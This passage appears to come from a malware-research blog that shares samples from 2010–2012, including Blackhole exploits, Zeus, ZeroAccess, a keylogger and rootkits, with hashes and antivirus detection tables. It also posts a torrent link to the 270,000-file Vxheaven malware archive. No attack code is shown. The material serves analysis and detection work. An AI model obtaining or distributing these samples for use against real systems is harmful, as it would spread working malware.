TheHacker     -     20120218
TrendMicro     JAVA_EXPLOYT.KAT     20120218
TrendMicro-HouseCall     JAVA_EXPLOYT.KAT     20120218
VBA32     Exploit.Java.CVE-2011-3544.l     20120217
ViRobot     -     20120307
VirusBuster     -

007 - Crime - Blackhole Flash CVE-2011-0611 SWF - Exploit - Web - Feb 2012


MD5:  196D309B7366F7507586CD162C8ED2C9

Download (pass infected) 



 Name  Blackhole Flash CVE-2011-0611_SWF
Category
Crime
type exploit
vector  Web
Sample credit Mila
Date Feb 2012



ActionScript



Virustotal
SHA256:     1581dc1e2cac90116a7f91bb8e68d44a7f4513369309c691f71f2d022d85e63a
SHA1:     5eae153d5ad6c0967b88bfc9efb7c535dca25ff1
MD5:     196d309b7366f7507586cd162c8ed2c9
File size:     7.0 KB ( 7124 bytes )
File name:     11519464962-9-4_1.x-shockwave-flash
File type:     Flash
Detection ratio:     10 / 43
Analysis date:     2012-03-06 13:23:20 UTC ( 15 hours, 56 minutes ago )
Antivirus     Result     Update
AhnLab-V3     -     20120305
AntiVir     EXP/CVE-2011-0611.FL     20120306
Antiy-AVL     -     20120305
Avast     SWF:Downloader-AK [Expl]     20120306
BitDefender     Script.SWF.Cxx     20120306
F-Secure     Script.SWF.Cxx     20120306
Fortinet     SWF/CVE20110611.fam!exploit     20120305
GData     Script.SWF.Cxx     20120306
Kaspersky     Exploit.SWF.CVE-2011-0611.be     20120305
McAfee-GW-Edition     -     20120304
Norman     HTML/Shellcode.AA     20120304
nProtect     Script.SWF.Cxx     20120306
Sophos     Troj/SWFExp-AI     20120306

008 - Crime - Blackhole payload FakeAV - trojan - Web - Feb 2012

MD5:  4135cbcf65163b39ea4ed00da7114cbe

Download (pass infected) 




Name  Blackhole delivered FakeAV
Category
Crime
type trojan  dropper
vector  Web
Sample credit Mila
Date Feb 2012

https://www.virustotal.com/file/d2444eb298bcbcecc31c548b6f2554424304672e727fbf7497b3cc3df2e36e24/analysis/
 SHA256:     d2444eb298bcbcecc31c548b6f2554424304672e727fbf7497b3cc3df2e36e24
SHA1:     329c53e760aa26d6242fe61f0dd6bca7d3ba367d
MD5:     4135cbcf65163b39ea4ed00da7114cbe
File size:     801.0 KB ( 820224 bytes )
File name:     4135cbcf65163b39ea4ed00da7114cbe
File type:     Win32 EXE
Detection ratio:     23 / 43
Analysis date:     2011-12-10 15:30:24 UTC ( 3 months ago )
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Jorik     20111209
AntiVir     TR/Crypt.XPACK.Gen3     20111209
Antiy-AVL     Trojan/win32.agent.gen     20111210
Avast     Win32:FakeAlert-BPF [Trj]     20111209
AVG     Generic26.SLF     20111210
BitDefender     Gen:Variant.Kazy.47732     20111210
Comodo     UnclassifiedMalware     20111210
DrWeb     Trojan.Fakealert.26233     20111210
Emsisoft     Win32.SuspectCrc!IK     20111210
eTrust-Vet     -     20111209
F-Secure     Gen:Variant.Kazy.47732     20111210
Fortinet     W32/FakeAlert_Rena.BG!tr     20111210
GData     Gen:Variant.Kazy.47732     20111210
Ikarus     Win32.SuspectCrc     20111210
Kaspersky     HEUR:Trojan.Win32.Generic     20111210
McAfee     FakeAlert-Rena.bg     20111210
McAfee-GW-Edition     FakeAlert-Rena.bg     20111210
Norman     W32/Suspicious_Gen2.TVZEA     20111210
Panda     Trj/CI.A     20111210
Sophos     Mal/FakeAV-LX     20111210
SUPERAntiSpyware     -     20111210
TrendMicro     TROJ_GEN.R72C7L8     20111210
TrendMicro-HouseCall     TROJ_GEN.R72C7L8     20111210

009 - Crime - DNSChanger - TDL/Alureon rootkit variant - Rootkit - Web - June 2010

MD5:   0d7b87223d6fd2ab7236e56838c5563b

Download (pass infected) 






Name DNSChanger TDL rootkit variant
Category
Crime
type rootkit trojan 
vector  Web
Sample credit anonymous
Date June 2010

https://www.virustotal.com/file/d7623db7e16c1d5b9d20a263576afc289e7f974cc9cf15f2032f441b8f87c73c/analysis/1331487072/

SHA256:     d7623db7e16c1d5b9d20a263576afc289e7f974cc9cf15f2032f441b8f87c73c
SHA1:     1bc027cf28a63846ab46ea06d9c27133b5c09578
MD5:     0d7b87223d6fd2ab7236e56838c5563b
File size:     182.0 KB ( 186368 bytes )
File name:     DNSChanger_0d7b87223d6fd2ab7236e56838c5563b.exe
File type:     Win32 EXE
Detection ratio:     38 / 43
Analysis date:     2012-03-11 17:31:12 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Win-Trojan/TDSS4.Gen     20120310
AntiVir     TR/Crypt.XPACK.Gen     20120311
Antiy-AVL     Trojan/win32.agent.gen     20120311
Avast     Win32:Trojan-gen     20120311
AVG     Downloader.Agent2.SAW     20120311
BitDefender     Trojan.Generic.4103909     20120311
ByteHero     -     20120309
CAT-QuickHeal     -     20120311
ClamAV     Trojan.Dropper-25529     20120311
Commtouch     W32/Alureon.J.gen!Eldorado     20120311
Comodo     TrojWare.Win32.Olmarik.AME     20120311
DrWeb     BackDoor.Tdss.2215     20120311
Emsisoft     Trojan-Dropper.Win32.TDSS!IK     20120311
eSafe     Win32.VirToolObfusca     20120308
eTrust-Vet     Win32/Alureon.ATL     20120310
F-Prot     W32/Alureon.J.gen!Eldorado     20120311
F-Secure     Trojan.Generic.4103909     20120311
Fortinet     -     20120311
GData     Trojan.Generic.4103909     20120311
Ikarus     Trojan-Dropper.Win32.TDSS     20120311
Jiangmin     TrojanDownloader.Agent.cefc     20120301
K7AntiVirus     Trojan     20120310
Kaspersky     Packed.Win32.Krap.io     20120311
McAfee     FakeAlert-MI     20120307
McAfee-GW-Edition     FakeAlert-MI     20120311
Microsoft     Trojan:Win32/Alureon.CO     20120311
NOD32     Win32/Olmarik.TN     20120311
Norman     W32/Tdss.C!genr     20120311
nProtect     Trojan-Downloader/W32.Agent.186368.AO     20120310
Panda     Suspicious file     20120311
PCTools     Trojan.Generic     20120311
Prevx     -     20120311
Rising     Trojan.Win32.Generic.128B788C     20120309
Sophos     Troj/Virtum-Gen     20120311
SUPERAntiSpyware     Rootkit.Agent/Gen-Trexer     20120308
Symantec     Trojan Horse     20120311
TheHacker     Trojan/Downloader.Agent.dcny     20120309
TrendMicro     TROJ_COSMU.SM     20120311
TrendMicro-HouseCall     TROJ_COSMU.SM     20120311
VBA32     Trojan.Olmarik.tn     20120311
VIPRE     Trojan.Win32.Obfusc.o.gen (v)     20120311
ViRobot     -     20120311
VirusBuster     Trojan.DL.Agent!JRDQILTdMj4     20120311

010 - Crime - GameOver Zeus (with P2P and DGA) -trojan- - Web - Feb 2012

MD5:    29bd4104db1417d8323d124ab355e232

Download (pass infected)





Name Gameover Zeus variant (with P2P and DGA)
Category
Crime
type trojan 
vector  Web
Sample credit anonymous
Date Feb 2012


https://www.virustotal.com/file/701b1a1a8f6b59c2ec79776d332a3149f9d5e2ae449214a13a5f76c371fec522/analysis/1331487539/

SHA256:     701b1a1a8f6b59c2ec79776d332a3149f9d5e2ae449214a13a5f76c371fec522
SHA1:     6027557ace4158d21b771503ed3d84f8911134a8
MD5:     29bd4104db1417d8323d124ab355e232
File size:     321.5 KB ( 329192 bytes )
File name:     melt.exe
File type:     Win32 EXE
Detection ratio:     36 / 43
Analysis date:     2012-03-11 17:38:59 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Spyware/Win32.Zbot     20120310
AntiVir     TR/PSW.Zbot.142     20120311
Antiy-AVL     Trojan/Win32.Zbot.gen     20120311
Avast     Win32:Crypt-LKD [Trj]     20120311
AVG     PSW.Generic9.BJJL     20120311
BitDefender     Gen:Variant.Kazy.54668     20120311
ByteHero     -     20120309
CAT-QuickHeal     TrojanPWS.Zbot.Y     20120311
ClamAV     Trojan.Spy.Zbot-568     20120311
Commtouch     W32/Zbot.DQ.gen!Eldorado     20120311
Comodo     TrojWare.Win32.Spy.ZBot.DIWT     20120311
DrWeb     Trojan.PWS.Panda.1698     20120311
Emsisoft     Trojan-Spy.Win32.Zbot!IK     20120311
eSafe     -     20120308
eTrust-Vet     Win32/Zbot.AA!generic     20120310
F-Prot     W32/Zbot.DQ.gen!Eldorado     20120311
F-Secure     Gen:Variant.Kazy.54668     20120311
Fortinet     W32/Zbot.DIVN!tr     20120311
GData     Gen:Variant.Kazy.54668     20120311
Ikarus     Trojan-Spy.Win32.Zbot     20120311
Jiangmin     TrojanDropper.Injector.lbl     20120301
K7AntiVirus     Spyware     20120310
Kaspersky     Trojan-Spy.Win32.Zbot.divn     20120311
McAfee     PWS-Zbot.gen.re     20120308
McAfee-GW-Edition     PWS-Zbot.gen.re     20120311
Microsoft     PWS:Win32/Zbot.gen!AF     20120311
NOD32     Win32/Spy.Zbot.AAN     20120311
Norman     W32/Agent.XEHW     20120310
nProtect     Trojan-Spy/W32.ZBot.329192     20120311
Panda     Generic Trojan     20120311
PCTools     -     20120311
Prevx     -     20120311
Rising     -     20120309
Sophos     Troj/Zbot-BJZ     20120311
SUPERAntiSpyware     -     20120308
Symantec     Trojan.Zbot!gen30     20120311
TheHacker     Trojan/Spy.Zbot.dixa     20120309
TrendMicro     TSPY_ZBOT.SMKS     20120311
TrendMicro-HouseCall     TSPY_ZBOT.SMKS     20120311
VBA32     TrojanSpy.Zbot.diwt     20120311
VIPRE     Trojan.Win32.Zbot.bjz (v)     20120311
ViRobot     -     20120311
VirusBuster     TrojanSpy.Zbot!9voVWKfmClE     20120311

The file is a malware known as "CRDF.Trojan.PWS.Win32.PEx.Delphi.9883274346". Report on this threat: http://threatcenter.crdf.fr/?More&ID=70808 - 70808 -
#malware

011 - CVE-2010-0188 PDF - with decoded JS (thanks to Villy) - Mar 2012

MD5 B9E21C8ADFB5A3844CC2991ECBE0378C
Virustotal 8 / 41
Decoding help http://www.hashemian.com/tools/html-url-encode-decode.php 
Sample credit: thanks to anonymous donation 

Download (pass infected)



SHA256:     0638324b80aaa7d185f353fd4d5436d70845d648e62791e60cdc1626359c05cc
SHA1:     6bf714ac9dd12d0bfd06ac6377a0658d7c54e046
MD5:     b9e21c8adfb5a3844cc2991ecbe0378c
File size:     16.6 KB ( 17029 bytes )
File name:     1214934.pdf
File type:     PDF
Detection ratio:     8 / 41
Analysis date:     2012-03-22 11:47:54 UTC ( 1 minute ago )
Avast     PDF:ContEx [Heur]     20120320
AVG     Script/PDF.Exploit     20120322
Kaspersky     Exploit.JS.Pdfka.fpt     20120322
Microsoft     Exploit:Win32/Pdfjsc.AAX     20120322
NOD32     JS/Exploit.Pdfka.PJC.Gen     20120322
Sophos     Troj/PDFJs-WR     20120322

012 - Crime - ZeroAccess.D -rootkit - Web - Feb-Mar 2012


MD5 07665069649a5b4df0316c29ec2b0cdc

Download (pass infected) 





SHA256:     9ed60d93d43fc9a8a670e4eab9c0ddda65b59567bad2ffe17f4518d1ad368415
SHA1:     1cc11aa2d3936188b47658b73c6044aca84543f5
MD5:     07665069649a5b4df0316c29ec2b0cdc
File size:     56.1 KB ( 57472 bytes )
File name:     07665069649a5b4df0316c29ec2b0cdc
File type:     Win32 DLL
Detection ratio:     36 / 41
Analysis date:     2012-04-02 04:42:34 UTC ( 2 days, 21 hours ago )

Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.ZAccess     20120401
AntiVir     TR/Rootkit.Gen     20120401
Antiy-AVL     -     20120401
Avast     Win32:Rootkit-gen [Rtk]     20120401
AVG     BackDoor.Generic13.BKJK     20120402
BitDefender     Gen:Variant.Sirefef.1     20120402
ByteHero     -     20120328
CAT-QuickHeal     RootKit.ZAccess.A     20120401
ClamAV     Trojan.Rootkit-3026     20120402
Commtouch     W32/Rootkit.M.gen!Eldorado     20120401
Comodo     TrojWare.Win32.Rootkit.ZAccess.A     20120401
DrWeb     BackDoor.Maxplus.13     20120402
Emsisoft     Trojan-Dropper.Win32.Sirefef!IK     20120402
eTrust-Vet     Win32/Sirefef.C!generic     20120331
F-Prot     W32/Rootkit.M.gen!Eldorado     20120401
F-Secure     Gen:Variant.Sirefef.1     20120402
Fortinet     W32/Dropper.36D7!tr.rkit     20120401
GData     Gen:Variant.Sirefef.1     20120402
Ikarus     Trojan-Dropper.Win32.Sirefef     20120402
Jiangmin     Rootkit.ZAccess.y     20120331
K7AntiVirus     Trojan     20120331
Kaspersky     Virus.Win32.ZAccess.c     20120402
McAfee     Generic Rootkit.ev     20120402
McAfee-GW-Edition     Generic Rootkit.ev     20120401
Microsoft     TrojanDropper:Win32/Sirefef.B     20120401
NOD32     Win32/Rootkit.Agent.NUT     20120402
Norman     W32/ZAccess.R     20120401
nProtect     -     20120401
Panda     Generic Malware     20120401
PCTools     Trojan.Zeroaccess     20120326
Rising     RootKit.Win32.Sirefef.a     20120401
Sophos     Troj/ZAccess-D     20120402
SUPERAntiSpyware     -     20120329
Symantec     Trojan.Zeroaccess!inf     20120401
TheHacker     Trojan/ZAccess.c     20120401
TrendMicro     TROJ_DRPR.SMUS     20120401
TrendMicro-HouseCall     TROJ_DRPR.SMUS     20120402
VBA32     Rootkit.ZAccess.c     20120330
VIPRE     Trojan.Win32.Sirefef.cr (v)     20120402
ViRobot     -     20120402
VirusBuster     Rootkit.ZAccess!+gmGVd9rpBM     20120401
 

013 - Crime - Kelihos.B - Trojan - Web - Feb 2012

MD5 eca54de6268f57ed1a9a2b9f0f877cb4
 spam trojan

Download (pass infected)

 


SHA256:     78ccee8e07ebbc84d9ba4f5d4952ccc6bf516213559b3317a915fd2566c22fe1
SHA1:     77a4bc93f54cdeb30804773a8ef7459352fb92be
MD5:     eca54de6268f57ed1a9a2b9f0f877cb4
File size:     636.0 KB ( 651264 bytes )
File name:     eca54de6268f57ed1a9a2b9f0f877cb4.exe
File type:     Win32 EXE
Detection ratio:     33 / 40
Analysis date:     2012-04-05 01:02:12 UTC ( 1 hour, 24 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.FakeAV     20120404
AntiVir     TR/Crypt.XPACK.Gen2     20120404
Antiy-AVL     Backdoor/Win32.Bredolab.gen     20120403
Avast     Win32:MalOb-GZ [Cryp]     20120404
AVG     Win32/Cryptor     20120404
BitDefender     Gen:Variant.Kazy.21101     20120405
ByteHero     -     20120404
CAT-QuickHeal     FraudTool.Security     20120404
ClamAV     -     20120404
Commtouch     W32/SuspPack.DA.gen!Eldorado     20120404
Comodo     TrojWare.Win32.Kryptik.MZR     20120405
DrWeb     Trojan.Packed.21552     20120405
Emsisoft     Backdoor.Win32.Kelihos!IK     20120405
eSafe     -     20120404
eTrust-Vet     Win32/FakeAV.AK!generic     20120405
F-Prot     W32/SuspPack.DA.gen!Eldorado     20120404
F-Secure     Gen:Variant.Kazy.21101     20120404
Fortinet     W32/PKeliAV.fam@mm     20120404
GData     Gen:Variant.Kazy.21101     20120405
Ikarus     Backdoor.Win32.Kelihos     20120405
Jiangmin     Backdoor/Bredolab.hqp     20120331
K7AntiVirus     Riskware     20120404
Kaspersky     Backdoor.Win32.Bredolab.mog     20120404
McAfee     Generic FakeAlert.ama     20120405
McAfee-GW-Edition     Generic FakeAlert.ama     20120404
Microsoft     Backdoor:Win32/Kelihos.B     20120404
NOD32     a variant of Win32/Kryptik.MZR     20120405
Norman     W32/FakeAV.ADPU     20120404
nProtect     Backdoor/W32.Bredolab.651264.CD     20120404
PCTools     HeurEngine.MaliciousPacker     20120405
Rising     -     20120401
SUPERAntiSpyware     Trojan.Agent/Gen-Multicon     20120402
Symantec     Packed.Generic.322     20120405
TheHacker     -     20120404
TrendMicro     TROJ_FAKEAV.SMIE     20120404
TrendMicro-HouseCall     TROJ_FAKEAV.SMIE     20120405
VBA32     -     20120404
VIPRE     FraudTool.Win32.MSRemovalTool.ek!b (v)     20120404
ViRobot     -     20120404
VirusBuster     Trojan.Kelihos.Gen!Pac     20120404

014 - Crime - Sinowal/Mebroot/Torpig - Rootkit, Trojan - Web - Feb-Mar 2012

MD5:  13CE4CD747E450A129D900E842315328
MD5:  C2BB7A8316EF7A106E6A3B3BB8D5532A
MD5:  CBE853D5D7EC089EF0302789284D6C44
MD5:  E16261185C13FB16213288A3860C1B8D


Download (pass infected)



SHA256:     0dcb7a582a0e72dcccf4fd855a159a4206b67b85fdcd0f58b71d85ba28e40440
SHA1:     69dd85ab1cd7098e1510aec2afa6b3e2a6814999
MD5:     13ce4cd747e450a129d900e842315328
File size:     816.0 KB ( 835584 bytes )
File name:     13ce4cd747e450a129d900e842315328
File type:     Win32 DLL
Detection ratio:     26 / 42
Analysis date:     2012-04-02 04:30:30 UTC ( 2 days, 22 hours ago )

Antivirus     Result     Update
AhnLab-V3     Backdoor/Win32.Sinowal     20120401
AntiVir     TR/Kazy.3545812     20120401
Antiy-AVL     -     20120401
Avast     Win32:Sinowal-JA [Trj]     20120401
AVG     PSW.Agent.7.AZ     20120402
BitDefender     Trojan.PWS.Sinowal.NCX     20120402
ByteHero     -     20120328
CAT-QuickHeal     -     20120401
ClamAV     -     20120402
Commtouch     W32/Sinowal.AA.gen!Eldorado     20120401
Comodo     UnclassifiedMalware     20120401
DrWeb     BackDoor.MaosBoot.377     20120402
Emsisoft     Trojan-Dropper.Agent!IK     20120402
eSafe     -     20120328
eTrust-Vet     Win32/Sinowal.F!generic     20120331
F-Prot     W32/Sinowal.AA.gen!Eldorado     20120401
F-Secure     Trojan.PWS.Sinowal.NCX     20120402
Fortinet     W32/Sinowal.NYN!tr     20120401
GData     Trojan.PWS.Sinowal.NCX     20120402
Ikarus     Trojan-Dropper.Agent     20120402
Jiangmin     -     20120331
K7AntiVirus     Backdoor     20120331
Kaspersky     Backdoor.Win32.Sinowal.odq     20120402
McAfee     -     20120402
McAfee-GW-Edition     -     20120401
Microsoft     PWS:Win32/Sinowal.gen!Y     20120401
NOD32     a variant of Win32/Kryptik.SJI     20120402
Norman     W32/Crypt.AWKB     20120401
nProtect     Trojan.PWS.Sinowal.NCX     20120401
Panda     Suspicious file     20120401
PCTools     -     20120326
Rising     -     20120401
Sophos     Mal/Sinowal-N     20120402
SUPERAntiSpyware     -     20120329
Symantec     -     20120401
TheHacker     -     20120401
TrendMicro     -     20120401
TrendMicro-HouseCall     -     20120402
VBA32     BScope.Trojan.MTA.01512     20120330
VIPRE     Trojan-Dropper.Win32.Sinowal.y (v)     20120402
ViRobot     -     20120402
VirusBuster     Trojan.DR.Sinowal.Gen.20     20120401

015 - Crime - Koutodoor.F - Trojan - Web - Feb-Mar 2012

MD5 ecd4aa51e755f174a39434df02775cc1

Download (pass infected)







SHA256:1765ac579aa3307bd087b7da6018141a4fa7529dfbd0c5a14aa7816b15745ac8
SHA1:be83ea65e884f8156e2242da2f65cde08db53d5f
MD5:ecd4aa51e755f174a39434df02775cc1
File size:39.8 KB ( 40768 bytes )
File name:ecd4aa51e755f174a39434df02775cc1
File type:Win32 EXE
Detection ratio:31 / 42
Analysis date: 2012-03-31 20:37:14 UTC ( 4 days, 6 hours ago )
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/Koutodoor8.Gen     20120331
AntiVir     TR/Rootkit.Gen     20120330
Antiy-AVL     -     20120331
Avast     Win32:Caxnet [Trj]     20120331
AVG     Hider.DXA     20120331
BitDefender     Gen:Variant.Koutodoor.4     20120331
ByteHero     -     20120328
CAT-QuickHeal     Trojan.Koutodoor.E     20120331
ClamAV     -     20120331
Commtouch     W32/Koutodoor.O.gen!Eldorado     20120331
Comodo     TrojWare.Win32.Zybr.A     20120331
DrWeb     Trojan.PWS.UClub.580     20120331
Emsisoft     Trojan.WinNT.Koutodoor!IK     20120331
eSafe     -     20120328
eTrust-Vet     Win32/Koutodoor.G!generic     20120331
F-Prot     W32/Koutodoor.O.gen!Eldorado     20120331
F-Secure     Gen:Variant.Koutodoor.4     20120331
Fortinet     W32/Koutodoor.A!tr.rkit     20120331
GData     Gen:Variant.Koutodoor.4     20120331
Ikarus     Trojan.WinNT.Koutodoor     20120331
Jiangmin     Trojan/Generic.bkiv     20120331
K7AntiVirus     Riskware     20120331
Kaspersky     HEUR:Trojan.Win32.Generic     20120331
McAfee     Koutodoor.gen.l     20120331
McAfee-GW-Edition     Koutodoor.gen.l     20120331
Microsoft     Trojan:Win32/Koutodoor.F     20120331
NOD32     a variant of Win32/Koutodoor.HE     20120331
Norman     W32/Koutodoor.CUS     20120331
nProtect     -     20120331
Panda     -     20120331
PCTools     -     20120326
Rising     RootKit.Win32.Obfuscator.g     20120331
Sophos     -     20120331
SUPERAntiSpyware     Trojan.Agent/Gen-Koocha     20120329
Symantec     -     20120331
TheHacker     -     20120331
TrendMicro     RTKT_KTDOOR.SMIB     20120331
TrendMicro-HouseCall     RTKT_KTDOOR.SMIB     20120331
VBA32     Malware-Cryptor.Inject.gen.2     20120330
VIPRE     Trojan.Win32.Koutodoor.e.dll (v)     20120331
ViRobot     -     20120331
VirusBuster     Rootkit.Koutodoor.Gen.7     20120331

016 - Crime - SCKeyLog.O - Trojan, keylogger - Web - Feb-Mar 2012

MD5 bf53d17ace809cb3015eaed88a46d8aa

Download (pass infected)


 

SHA256:553bdd506f30c0786fd9d02551388bfb3c4e6cc819343e360faa46cc1003b7c7
SHA1:ed29cda3a284acf9eb258dccd9ea476de7a907e2
MD5:bf53d17ace809cb3015eaed88a46d8aa
File size:28.8 KB ( 29460 bytes )
File name:bf53d17ace809cb3015eaed88a46d8aa
File type:Win32 EXE
Tags:armadillo
Detection ratio:39 / 42
Analysis date: 2012-03-31 20:49:32 UTC ( 4 days, 5 hours ago )
Antivirus     Result     Update
AhnLab-V3     Unwanted/Win32.Keylogger     20120331
AntiVir     TR/Spy.SCKeyLo.o.17     20120330
Antiy-AVL     Trojan/Win32.SCKeyLog.gen     20120331
Avast     Win32:SCKeylog-B [Trj]     20120331
AVG     PSW.Generic8.MUF     20120331
BitDefender     Trojan.Generic.4097795     20120331
ByteHero     -     20120328
CAT-QuickHeal     Win32.Trojan-Spy.SCKeyLog.au.4     20120331
ClamAV     Trojan.Spy-202     20120331
Commtouch     W32/SCkeylogger.D     20120331
Comodo     TrojWare.Win32.Spy.SCKeyLog.O     20120331
DrWeb     Trojan.SCKeyLog.20     20120331
Emsisoft     Virus.Win32.SCkeylog!IK     20120331
eSafe     Win32.Trojan     20120328
eTrust-Vet     Win32/SCKeylog.M     20120331
F-Prot     W32/SCkeylogger.D     20120331
F-Secure     Trojan.Generic.4097795     20120331
Fortinet     W32/Sckeylog.O!tr     20120331
GData     Trojan.Generic.4097795     20120331
Ikarus     Virus.Win32.SCkeylog     20120331
Jiangmin     TrojanSpy.SCKeyLog.ey     20120331
K7AntiVirus     Spyware     20120331
Kaspersky     Trojan-Spy.Win32.SCKeyLog.au     20120331
McAfee     Keylog-SClog     20120331
McAfee-GW-Edition     Keylog-SClog     20120331
Microsoft     TrojanSpy:Win32/SCKeyLog.O     20120331
NOD32     Win32/Spy.SCKeyLog.O     20120331
Norman     SCKeylog.ANMB     20120331
nProtect     -     20120331
Panda     Trj/Rovaf.A     20120331
PCTools     Spyware.SCKeyLogger!rem     20120326
Rising     Trojan.Spy.ScrSaver.a     20120331
Sophos     Troj/SCKeyLog-O     20120331
SUPERAntiSpyware     -     20120329
Symantec     Spyware.SCKeyLogger     20120331
TheHacker     Trojan/Spy.SCKeyLog.au     20120331
TrendMicro     TROJ_FAM_000000700.TOMA     20120331
TrendMicro-HouseCall     TROJ_FAM_000000700.TOMA     20120331
VBA32     TrojanSpy.SCKeyLog.au     20120330
VIPRE     Trojan.Win32.Generic!BT     20120331
ViRobot     Trojan.Win32.SCKeyLog.29488     20120331
VirusBuster     TrojanSpy.SCKeyLog!MYQVzWmqzaA     20120331

017 - Crime - Dozmot.D - Trojan - Web - Feb-Mar 2012

MD5 2190db2c50c6cebffdb13ddeeec23186

 Download (pass infected)




SHA256:     bf97be25c653d648dd27ef76b9fc4b82484940e257c7eaf94f76bfe7561fe137
SHA1:     cc9466b57bc1992bc1ed31eb963df3662e287886
MD5:     2190db2c50c6cebffdb13ddeeec23186
File size:     29.5 KB ( 30208 bytes )
File name:     2190db2c50c6cebffdb13ddeeec23186
File type:     Win32 DLL
Detection ratio:     36 / 42
Analysis date:     2012-03-31 20:52:08 UTC ( 4 days, 5 hours ago )
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/Onlinegamehack15.Gen     20120331
AntiVir     TR/PSW.OnlineGames.wsrk     20120330
Antiy-AVL     -     20120331
Avast     Win32:Lolyda-B [Trj]     20120331
AVG     PSW.OnlineGames3.BIQR     20120331
BitDefender     Gen:Variant.Graftor.197     20120331
ByteHero     -     20120328
CAT-QuickHeal     TrojanPWS.Dozmot.D4     20120331
ClamAV     Trojan.Spy-73885     20120331
Commtouch     W32/MalwareF.NAFO     20120331
Comodo     TrojWare.Win32.GameThief.Wow.A     20120331
DrWeb     Trojan.PWS.Gamania.origin     20120331
Emsisoft     Trojan-GameThief.Win32.OnLineGames!IK     20120331
eSafe     -     20120328
eTrust-Vet     Win32/Gamepass.PNO     20120331
F-Prot     W32/MalwareF.NAFO     20120331
F-Secure     Gen:Variant.Graftor.197     20120331
Fortinet     W32/Onlinegames.OST!tr.pws     20120331
GData     Gen:Variant.Graftor.197     20120331
Ikarus     Trojan-GameThief.Win32.OnLineGames     20120331
Jiangmin     Trojan/PSW.Magania.axdu     20120331
K7AntiVirus     Riskware     20120331
Kaspersky     Trojan-GameThief.Win32.Magania.eqve     20120331
McAfee     Generic PWS.ff     20120331
McAfee-GW-Edition     Generic PWS.ff     20120331
Microsoft     PWS:Win32/Dozmot.D     20120331
NOD32     a variant of Win32/PSW.WOW.NSF     20120331
Norman     W32/Magania.GZ     20120331
nProtect     -     20120331
Panda     Suspicious file     20120331
PCTools     Trojan-PSW.Generic     20120326
Rising     Trojan.PSW.Win32.GameOL.tje     20120331
Sophos     Troj/PWS-BLS     20120331
SUPERAntiSpyware     -     20120329
Symantec     Infostealer     20120331
TheHacker     Trojan/Magania.eqvb     20120331
TrendMicro     TSPY_GAMETHI.SML     20120331
TrendMicro-HouseCall     TSPY_GAMETHI.SML     20120331
VBA32     BScope.Trojan.OnlineGames.0825     20120330
VIPRE     Trojan.Win32.Generic!BT     20120331
ViRobot     -     20120331
VirusBuster     Trojan.PWS.Magania!3ZNm0Z/N/Rs     20120331

Old (circa 2009-2010) Vxhaven binary collection - 270,000+ files - via torrent

Vxhaven old malware collection.

The Vxhavens forum, which served the malware research community for many years, went dark on March 23, 2012. You can read about it (and voice your support if you do not agree with the takedown) here: http://vx.netlux.org/index.html


Regarding the collection:

This collection is not a result of the takedown. It was released as a torrent earlier this year, but since it is already out in public, seeded by many and posted in many places, I am posting the torrent link here as well, because it is useful for research and the primary source is no longer available. I understand that it was not released by the owners, but I still want to thank the Vxhavens members who collected all these samples.

For your convenience, I added a list of the binaries in the text file and the scroll boxes below.
All binaries in the torrent are older than 2010 (over 270K files, many variants of the same malware), but if you need them for large-scale testing of your sandbox, or need to pick a few specific files for research and comparison, it might be useful.

If you need only one or a few and are desperate or cannot download it all on your own, you can ping me and I can send those few.

Torrent (47GB compressed) - http://thepiratebay.se/torrent/7066921/Vx_heavens_collection%28all%29

Download the text log of all files - no password on the log

or the categorized log is here (save as HTML)



Categories


  1. Backdoors ASP, IRC, BOOT, DOS, Java
  2. Backdoors - FreeBSD, Linux, Unix, OS2, SunOS, Mac
  3. Backdoors Win16, Win32, Win64
  4. Constructors BAT, DOS, HTML, MSIL, MSWORD, Perl , Ruby, VBS
  5. Constructors Win16, Win32
  6. DoS Linux, Perl, SAP
  7. DoS Win16, Win32, EICAR-Test-File
  8. Email Flooders
  9. Email Win16, Win32
  10. Email Worm BAT, JS, Word, VBS
  11. Exploits Flash/SWF, MSOffice, Perl, MySQL, PHP, Python
  12. Exploits HTML, DOS, IIS, IRC, JAVA/JS
  13. Exploits Linux, Mac OS, Unix, MySQL
  14. Exploits VBS, Win32
  15. Flooder IRC, DOS, Linux, Unix, PHP, Java
  16. Flooder Win32
  17. Hacktools DOS, FreeBSD, Linux, MSIL, Perl, PHP, Shell, SunOS, Unix, Win32,
  18. Hoaxes and Bad Jokes
  19. IM flooders and worms
  20. IRC Worms, P2P worms
  21. RATs
  22. SMS Flooders
  23. Sniffers, Spoofers, and Spam tools
  24. some packed samples, Rootkits
  25. Trojans Acad, ANSI, BAT, Boot, DOS
  26. Trojans Bankers
  27. Trojans Clickers
  28. Trojans DDoS
  29. Trojans DOS, Spy
  30. Trojans Downloaders
  31. Trojans Droppers
  32. Trojans EPOC, HTA, HTML, IRC, Java/JS
  33. Trojans Gamethief, IM, Mailfinder, Notifier, Proxy, Password stealers,
  34. Trojans Linux, Unix and Mac
  35. Trojans Lotus, Excel, MSWord, MSIL, Novell, NSIS, OLE2, RAR, Perl, PHP
  36. Trojans Palm, SymbOS
  37. Trojans SMS, SymbOS
  38. Trojans VBS
  39. Trojans Win16, Win32
  40. Virtools
  41. Viruses Acad, 1C, ALS, ABAP, BAT, DOS
  42. Viruses HTML, JS, Java, KIX
  43. Viruses Linux, FreeBSD, Mac,
  44. Viruses Makefile, Matlab, MFL, Menuel, MSAccess, MSExcel, MSWord, MSOffice,
  45. Viruses Multi, PHP, Perl, OS2, Ruby,
  46. Viruses Python, Script, VBS
  47. Viruses Win16, Win32
  48. VWorms BAT, DOS, JS, MSIL, Symbos, VBS, Win32
  49. Worms Java/JS, PHP, Win32
  50. Worms Linux


[Per-category scroll boxes with the individual file names follow here on the original page; their contents are not reproduced. The box headings match the categories listed above, plus one more: Backdoors MSIL, MSSQL, Perl, PHP, VBS, Python.]

018 - Crime - "Microsoft Update" phish -> Blackhole exploit kit with Zeus payload - Web - April 2012

File: KB971033.exe
Size: 201216
MD5:  EC750B75E83749C715D7834E130FCE8E

File: hnszs0.exe
Size: 184832
MD5:  9DB4174373601F74FCE0ECBC77A9577D

Sample credit Bryan Nolen

Download (pass infected)


